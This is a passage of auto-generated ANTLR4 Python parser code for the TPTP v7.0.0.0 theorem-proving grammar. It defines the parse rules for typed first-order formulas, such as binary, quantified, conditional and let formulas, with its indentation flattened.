def tfx_logic_formula(self):
localctx = tptp_v7_0_0_0Parser.Tfx_logic_formulaContext(self, self._ctx, self.state)
self.enterRule(localctx, 96, self.RULE_tfx_logic_formula)
try:
self.enterOuterAlt(localctx, 1)
self.state = 758
self.thf_logic_formula()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Tff_formulaContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def tff_logic_formula(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tff_logic_formulaContext,0)
def tff_typed_atom(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tff_typed_atomContext,0)
def tff_sequent(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tff_sequentContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_tff_formula
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterTff_formula" ):
listener.enterTff_formula(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitTff_formula" ):
listener.exitTff_formula(self)
def tff_formula(self):
localctx = tptp_v7_0_0_0Parser.Tff_formulaContext(self, self._ctx, self.state)
self.enterRule(localctx, 98, self.RULE_tff_formula)
try:
self.state = 763
self._errHandler.sync(self)
la_ = self._interp.adaptivePredict(self._input,34,self._ctx)
if la_ == 1:
self.enterOuterAlt(localctx, 1)
self.state = 760
self.tff_logic_formula()
pass
elif la_ == 2:
self.enterOuterAlt(localctx, 2)
self.state = 761
self.tff_typed_atom()
pass
elif la_ == 3:
self.enterOuterAlt(localctx, 3)
self.state = 762
self.tff_sequent()
pass
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Tff_logic_formulaContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def tff_binary_formula(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tff_binary_formulaContext,0)
def tff_unitary_formula(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tff_unitary_formulaContext,0)
def tff_subtype(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tff_subtypeContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_tff_logic_formula
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterTff_logic_formula" ):
listener.enterTff_logic_formula(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitTff_logic_formula" ):
listener.exitTff_logic_formula(self)
def tff_logic_formula(self):
localctx = tptp_v7_0_0_0Parser.Tff_logic_formulaContext(self, self._ctx, self.state)
self.enterRule(localctx, 100, self.RULE_tff_logic_formula)
try:
self.state = 768
self._errHandler.sync(self)
la_ = self._interp.adaptivePredict(self._input,35,self._ctx)
if la_ == 1:
self.enterOuterAlt(localctx, 1)
self.state = 765
self.tff_binary_formula()
pass
elif la_ == 2:
self.enterOuterAlt(localctx, 2)
self.state = 766
self.tff_unitary_formula()
pass
elif la_ == 3:
self.enterOuterAlt(localctx, 3)
self.state = 767
self.tff_subtype()
pass
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Tff_binary_formulaContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def tff_binary_nonassoc(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tff_binary_nonassocContext,0)
def tff_binary_assoc(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tff_binary_assocContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_tff_binary_formula
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterTff_binary_formula" ):
listener.enterTff_binary_formula(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitTff_binary_formula" ):
listener.exitTff_binary_formula(self)
def tff_binary_formula(self):
localctx = tptp_v7_0_0_0Parser.Tff_binary_formulaContext(self, self._ctx, self.state)
self.enterRule(localctx, 102, self.RULE_tff_binary_formula)
try:
self.state = 772
self._errHandler.sync(self)
la_ = self._interp.adaptivePredict(self._input,36,self._ctx)
if la_ == 1:
self.enterOuterAlt(localctx, 1)
self.state = 770
self.tff_binary_nonassoc()
pass
elif la_ == 2:
self.enterOuterAlt(localctx, 2)
self.state = 771
self.tff_binary_assoc()
pass
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Tff_binary_nonassocContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def tff_unitary_formula(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(tptp_v7_0_0_0Parser.Tff_unitary_formulaContext)
else:
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tff_unitary_formulaContext,i)
def binary_connective(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Binary_connectiveContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_tff_binary_nonassoc
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterTff_binary_nonassoc" ):
listener.enterTff_binary_nonassoc(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitTff_binary_nonassoc" ):
listener.exitTff_binary_nonassoc(self)
def tff_binary_nonassoc(self):
localctx = tptp_v7_0_0_0Parser.Tff_binary_nonassocContext(self, self._ctx, self.state)
self.enterRule(localctx, 104, self.RULE_tff_binary_nonassoc)
try:
self.enterOuterAlt(localctx, 1)
self.state = 774
self.tff_unitary_formula()
self.state = 775
self.binary_connective()
self.state = 776
self.tff_unitary_formula()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Tff_binary_assocContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def tff_or_formula(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tff_or_formulaContext,0)
def tff_and_formula(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tff_and_formulaContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_tff_binary_assoc
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterTff_binary_assoc" ):
listener.enterTff_binary_assoc(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitTff_binary_assoc" ):
listener.exitTff_binary_assoc(self)
def tff_binary_assoc(self):
localctx = tptp_v7_0_0_0Parser.Tff_binary_assocContext(self, self._ctx, self.state)
self.enterRule(localctx, 106, self.RULE_tff_binary_assoc)
try:
self.state = 780
self._errHandler.sync(self)
la_ = self._interp.adaptivePredict(self._input,37,self._ctx)
if la_ == 1:
self.enterOuterAlt(localctx, 1)
self.state = 778
self.tff_or_formula(0)
pass
elif la_ == 2:
self.enterOuterAlt(localctx, 2)
self.state = 779
self.tff_and_formula(0)
pass
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Tff_or_formulaContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def tff_unitary_formula(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(tptp_v7_0_0_0Parser.Tff_unitary_formulaContext)
else:
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tff_unitary_formulaContext,i)
def Or(self):
return self.getToken(tptp_v7_0_0_0Parser.Or, 0)
def tff_or_formula(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tff_or_formulaContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_tff_or_formula
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterTff_or_formula" ):
listener.enterTff_or_formula(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitTff_or_formula" ):
listener.exitTff_or_formula(self)
def tff_or_formula(self, _p:int=0):
_parentctx = self._ctx
_parentState = self.state
localctx = tptp_v7_0_0_0Parser.Tff_or_formulaContext(self, self._ctx, _parentState)
_prevctx = localctx
_startState = 108
self.enterRecursionRule(localctx, 108, self.RULE_tff_or_formula, _p)
try:
self.enterOuterAlt(localctx, 1)
self.state = 783
self.tff_unitary_formula()
self.state = 784
self.match(tptp_v7_0_0_0Parser.Or)
self.state = 785
self.tff_unitary_formula()
self._ctx.stop = self._input.LT(-1)
self.state = 792
self._errHandler.sync(self)
_alt = self._interp.adaptivePredict(self._input,38,self._ctx)
while _alt!=2 and _alt!=ATN.INVALID_ALT_NUMBER:
if _alt==1:
if self._parseListeners is not None:
self.triggerExitRuleEvent()
_prevctx = localctx
localctx = tptp_v7_0_0_0Parser.Tff_or_formulaContext(self, _parentctx, _parentState)
self.pushNewRecursionContext(localctx, _startState, self.RULE_tff_or_formula)
self.state = 787
if not self.precpred(self._ctx, 1):
from antlr4.error.Errors import FailedPredicateException
raise FailedPredicateException(self, "self.precpred(self._ctx, 1)")
self.state = 788
self.match(tptp_v7_0_0_0Parser.Or)
self.state = 789
self.tff_unitary_formula()
self.state = 794
self._errHandler.sync(self)
_alt = self._interp.adaptivePredict(self._input,38,self._ctx)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.unrollRecursionContexts(_parentctx)
return localctx
class Tff_and_formulaContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def tff_unitary_formula(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(tptp_v7_0_0_0Parser.Tff_unitary_formulaContext)
else:
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tff_unitary_formulaContext,i)
def And(self):
return self.getToken(tptp_v7_0_0_0Parser.And, 0)
def tff_and_formula(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tff_and_formulaContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_tff_and_formula
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterTff_and_formula" ):
listener.enterTff_and_formula(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitTff_and_formula" ):
listener.exitTff_and_formula(self)
def tff_and_formula(self, _p:int=0):
_parentctx = self._ctx
_parentState = self.state
localctx = tptp_v7_0_0_0Parser.Tff_and_formulaContext(self, self._ctx, _parentState)
_prevctx = localctx
_startState = 110
self.enterRecursionRule(localctx, 110, self.RULE_tff_and_formula, _p)
try:
self.enterOuterAlt(localctx, 1)
self.state = 796
self.tff_unitary_formula()
self.state = 797
self.match(tptp_v7_0_0_0Parser.And)
self.state = 798
self.tff_unitary_formula()
self._ctx.stop = self._input.LT(-1)
self.state = 805
self._errHandler.sync(self)
_alt = self._interp.adaptivePredict(self._input,39,self._ctx)
while _alt!=2 and _alt!=ATN.INVALID_ALT_NUMBER:
if _alt==1:
if self._parseListeners is not None:
self.triggerExitRuleEvent()
_prevctx = localctx
localctx = tptp_v7_0_0_0Parser.Tff_and_formulaContext(self, _parentctx, _parentState)
self.pushNewRecursionContext(localctx, _startState, self.RULE_tff_and_formula)
self.state = 800
if not self.precpred(self._ctx, 1):
from antlr4.error.Errors import FailedPredicateException
raise FailedPredicateException(self, "self.precpred(self._ctx, 1)")
self.state = 801
self.match(tptp_v7_0_0_0Parser.And)
self.state = 802
self.tff_unitary_formula()
self.state = 807
self._errHandler.sync(self)
_alt = self._interp.adaptivePredict(self._input,39,self._ctx)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.unrollRecursionContexts(_parentctx)
return localctx
class Tff_unitary_formulaContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def tff_quantified_formula(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tff_quantified_formulaContext,0)
def tff_unary_formula(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tff_unary_formulaContext,0)
def tff_atomic_formula(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tff_atomic_formulaContext,0)
def tff_conditional(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tff_conditionalContext,0)
def tff_let(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tff_letContext,0)
def tff_logic_formula(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tff_logic_formulaContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_tff_unitary_formula
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterTff_unitary_formula" ):
listener.enterTff_unitary_formula(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitTff_unitary_formula" ):
listener.exitTff_unitary_formula(self)
def tff_unitary_formula(self):
localctx = tptp_v7_0_0_0Parser.Tff_unitary_formulaContext(self, self._ctx, self.state)
self.enterRule(localctx, 112, self.RULE_tff_unitary_formula)
try:
self.state = 817
self._errHandler.sync(self)
la_ = self._interp.adaptivePredict(self._input,40,self._ctx)
if la_ == 1:
self.enterOuterAlt(localctx, 1)
self.state = 808
self.tff_quantified_formula()
pass
elif la_ == 2:
self.enterOuterAlt(localctx, 2)
self.state = 809
self.tff_unary_formula()
pass
elif la_ == 3:
self.enterOuterAlt(localctx, 3)
self.state = 810
self.tff_atomic_formula()
pass
elif la_ == 4:
self.enterOuterAlt(localctx, 4)
self.state = 811
self.tff_conditional()
pass
elif la_ == 5:
self.enterOuterAlt(localctx, 5)
self.state = 812
self.tff_let()
pass
elif la_ == 6:
self.enterOuterAlt(localctx, 6)
self.state = 813
self.match(tptp_v7_0_0_0Parser.T__9)
self.state = 814
self.tff_logic_formula()
self.state = 815
self.match(tptp_v7_0_0_0Parser.T__10)
pass
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Tff_quantified_formulaContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def fof_quantifier(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Fof_quantifierContext,0)
def tff_variable_list(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tff_variable_listContext,0)
def tff_unitary_formula(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tff_unitary_formulaContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_tff_quantified_formula
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterTff_quantified_formula" ):
listener.enterTff_quantified_formula(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitTff_quantified_formula" ):
listener.exitTff_quantified_formula(self)
def tff_quantified_formula(self):
localctx = tptp_v7_0_0_0Parser.Tff_quantified_formulaContext(self, self._ctx, self.state)
self.enterRule(localctx, 114, self.RULE_tff_quantified_formula)
try:
self.enterOuterAlt(localctx, 1)
self.state = 819
self.fof_quantifier()
self.state = 820
self.match(tptp_v7_0_0_0Parser.T__11)
self.state = 821
self.tff_variable_list()
self.state = 822
self.match(tptp_v7_0_0_0Parser.T__12)
self.state = 823
self.match(tptp_v7_0_0_0Parser.T__13)
self.state = 824
self.tff_unitary_formula()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Tff_variable_listContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def tff_variable(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(tptp_v7_0_0_0Parser.Tff_variableContext)
else:
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tff_variableContext,i)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_tff_variable_list
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterTff_variable_list" ):
listener.enterTff_variable_list(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitTff_variable_list" ):
listener.exitTff_variable_list(self)
def tff_variable_list(self):
localctx = tptp_v7_0_0_0Parser.Tff_variable_listContext(self, self._ctx, self.state)
self.enterRule(localctx, 116, self.RULE_tff_variable_list)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 826
self.tff_variable()
self.state = 831
self._errHandler.sync(self)
_la = self._input.LA(1)
while _la==tptp_v7_0_0_0Parser.T__1:
self.state = 827
self.match(tptp_v7_0_0_0Parser.T__1)
self.state = 828
self.tff_variable()
self.state = 833
self._errHandler.sync(self)
_la = self._input.LA(1)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Tff_variableContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def tff_typed_variable(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tff_typed_variableContext,0)
def variable(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.VariableContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_tff_variable
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterTff_variable" ):
listener.enterTff_variable(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitTff_variable" ):
listener.exitTff_variable(self)
def tff_variable(self):
localctx = tptp_v7_0_0_0Parser.Tff_variableContext(self, self._ctx, self.state)
self.enterRule(localctx, 118, self.RULE_tff_variable)
try:
self.state = 836
self._errHandler.sync(self)
la_ = self._interp.adaptivePredict(self._input,42,self._ctx)
if la_ == 1:
self.enterOuterAlt(localctx, 1)
self.state = 834
self.tff_typed_variable()
pass
elif la_ == 2:
self.enterOuterAlt(localctx, 2)
self.state = 835
self.variable()
pass
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Tff_typed_variableContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def variable(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.VariableContext,0)
def tff_atomic_type(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tff_atomic_typeContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_tff_typed_variable
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterTff_typed_variable" ):
listener.enterTff_typed_variable(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitTff_typed_variable" ):
listener.exitTff_typed_variable(self)
def tff_typed_variable(self):
localctx = tptp_v7_0_0_0Parser.Tff_typed_variableContext(self, self._ctx, self.state)
self.enterRule(localctx, 120, self.RULE_tff_typed_variable)
try:
self.enterOuterAlt(localctx, 1)
self.state = 838
self.variable()
self.state = 839
self.match(tptp_v7_0_0_0Parser.T__13)
self.state = 840
self.tff_atomic_type()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Tff_unary_formulaContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def unary_connective(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Unary_connectiveContext,0)
def tff_unitary_formula(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tff_unitary_formulaContext,0)
def fof_infix_unary(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Fof_infix_unaryContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_tff_unary_formula
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterTff_unary_formula" ):
listener.enterTff_unary_formula(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitTff_unary_formula" ):
listener.exitTff_unary_formula(self)
def tff_unary_formula(self):
localctx = tptp_v7_0_0_0Parser.Tff_unary_formulaContext(self, self._ctx, self.state)
self.enterRule(localctx, 122, self.RULE_tff_unary_formula)
try:
self.state = 846
self._errHandler.sync(self)
token = self._input.LA(1)
if token in [tptp_v7_0_0_0Parser.Not]:
self.enterOuterAlt(localctx, 1)
self.state = 842
self.unary_connective()
self.state = 843
self.tff_unitary_formula()
pass
elif token in [tptp_v7_0_0_0Parser.T__17, tptp_v7_0_0_0Parser.T__18, tptp_v7_0_0_0Parser.T__23, tptp_v7_0_0_0Parser.T__24, tptp_v7_0_0_0Parser.T__25, tptp_v7_0_0_0Parser.Real, tptp_v7_0_0_0Parser.Rational, tptp_v7_0_0_0Parser.Integer, tptp_v7_0_0_0Parser.Dollar_word, tptp_v7_0_0_0Parser.Dollar_dollar_word, tptp_v7_0_0_0Parser.Upper_word, tptp_v7_0_0_0Parser.Lower_word, tptp_v7_0_0_0Parser.Single_quoted, tptp_v7_0_0_0Parser.Distinct_object]:
self.enterOuterAlt(localctx, 2)
self.state = 845
self.fof_infix_unary()
pass
else:
raise NoViableAltException(self)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Tff_atomic_formulaContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def fof_atomic_formula(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Fof_atomic_formulaContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_tff_atomic_formula
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterTff_atomic_formula" ):
listener.enterTff_atomic_formula(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitTff_atomic_formula" ):
listener.exitTff_atomic_formula(self)
def tff_atomic_formula(self):
localctx = tptp_v7_0_0_0Parser.Tff_atomic_formulaContext(self, self._ctx, self.state)
self.enterRule(localctx, 124, self.RULE_tff_atomic_formula)
try:
self.enterOuterAlt(localctx, 1)
self.state = 848
self.fof_atomic_formula()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Tff_conditionalContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def tff_logic_formula(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(tptp_v7_0_0_0Parser.Tff_logic_formulaContext)
else:
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tff_logic_formulaContext,i)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_tff_conditional
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterTff_conditional" ):
listener.enterTff_conditional(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitTff_conditional" ):
listener.exitTff_conditional(self)
def tff_conditional(self):
localctx = tptp_v7_0_0_0Parser.Tff_conditionalContext(self, self._ctx, self.state)
self.enterRule(localctx, 126, self.RULE_tff_conditional)
try:
self.enterOuterAlt(localctx, 1)
self.state = 850
self.match(tptp_v7_0_0_0Parser.T__20)
self.state = 851
self.tff_logic_formula()
self.state = 852
self.match(tptp_v7_0_0_0Parser.T__1)
self.state = 853
self.tff_logic_formula()
self.state = 854
self.match(tptp_v7_0_0_0Parser.T__1)
self.state = 855
self.tff_logic_formula()
self.state = 856
self.match(tptp_v7_0_0_0Parser.T__10)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Tff_letContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def tff_let_term_defns(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tff_let_term_defnsContext,0)
def tff_formula(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tff_formulaContext,0)
def tff_let_formula_defns(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tff_let_formula_defnsContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_tff_let
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterTff_let" ):
listener.enterTff_let(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitTff_let" ):
listener.exitTff_let(self)
def tff_let(self):
localctx = tptp_v7_0_0_0Parser.Tff_letContext(self, self._ctx, self.state)
self.enterRule(localctx, 128, self.RULE_tff_let)
try:
self.state = 870
self._errHandler.sync(self)
token = self._input.LA(1)
if token in [tptp_v7_0_0_0Parser.T__21]:
self.enterOuterAlt(localctx, 1)
self.state = 858
self.match(tptp_v7_0_0_0Parser.T__21)
self.state = 859
self.tff_let_term_defns()
self.state = 860
self.match(tptp_v7_0_0_0Parser.T__1)
self.state = 861
self.tff_formula()
self.state = 862
self.match(tptp_v7_0_0_0Parser.T__10)
pass
elif token in [tptp_v7_0_0_0Parser.T__22]:
self.enterOuterAlt(localctx, 2)
self.state = 864
self.match(tptp_v7_0_0_0Parser.T__22)
self.state = 865
self.tff_let_formula_defns()
self.state = 866
self.match(tptp_v7_0_0_0Parser.T__1)
self.state = 867
self.tff_formula()
self.state = 868
self.match(tptp_v7_0_0_0Parser.T__10)
pass
else:
raise NoViableAltException(self)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Tff_let_term_defnsContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def tff_let_term_defn(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tff_let_term_defnContext,0)
def tff_let_term_list(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tff_let_term_listContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_tff_let_term_defns
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterTff_let_term_defns" ):
listener.enterTff_let_term_defns(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitTff_let_term_defns" ):
listener.exitTff_let_term_defns(self)
def tff_let_term_defns(self):
localctx = tptp_v7_0_0_0Parser.Tff_let_term_defnsContext(self, self._ctx, self.state)
self.enterRule(localctx, 130, self.RULE_tff_let_term_defns)
try:
self.state = 877
self._errHandler.sync(self)
token = self._input.LA(1)
if token in [tptp_v7_0_0_0Parser.T__9, tptp_v7_0_0_0Parser.Forall, tptp_v7_0_0_0Parser.Lower_word, tptp_v7_0_0_0Parser.Single_quoted]:
self.enterOuterAlt(localctx, 1)
self.state = 872
self.tff_let_term_defn()
pass
elif token in [tptp_v7_0_0_0Parser.T__11]:
self.enterOuterAlt(localctx, 2)
self.state = 873
self.match(tptp_v7_0_0_0Parser.T__11)
self.state = 874
self.tff_let_term_list()
self.state = 875
self.match(tptp_v7_0_0_0Parser.T__12)
pass
else:
raise NoViableAltException(self)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Tff_let_term_listContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def tff_let_term_defn(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(tptp_v7_0_0_0Parser.Tff_let_term_defnContext)
else:
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tff_let_term_defnContext,i)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_tff_let_term_list
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterTff_let_term_list" ):
listener.enterTff_let_term_list(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitTff_let_term_list" ):
listener.exitTff_let_term_list(self)
def tff_let_term_list(self):
localctx = tptp_v7_0_0_0Parser.Tff_let_term_listContext(self, self._ctx, self.state)
self.enterRule(localctx, 132, self.RULE_tff_let_term_list)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 879
self.tff_let_term_defn()
self.state = 884
self._errHandler.sync(self)
_la = self._input.LA(1)
while _la==tptp_v7_0_0_0Parser.T__1:
self.state = 880
self.match(tptp_v7_0_0_0Parser.T__1)
self.state = 881
self.tff_let_term_defn()
self.state = 886
self._errHandler.sync(self)
_la = self._input.LA(1)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Tff_let_term_defnContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def Forall(self):
return self.getToken(tptp_v7_0_0_0Parser.Forall, 0)
def tff_variable_list(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tff_variable_listContext,0)
def tff_let_term_defn(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tff_let_term_defnContext,0)
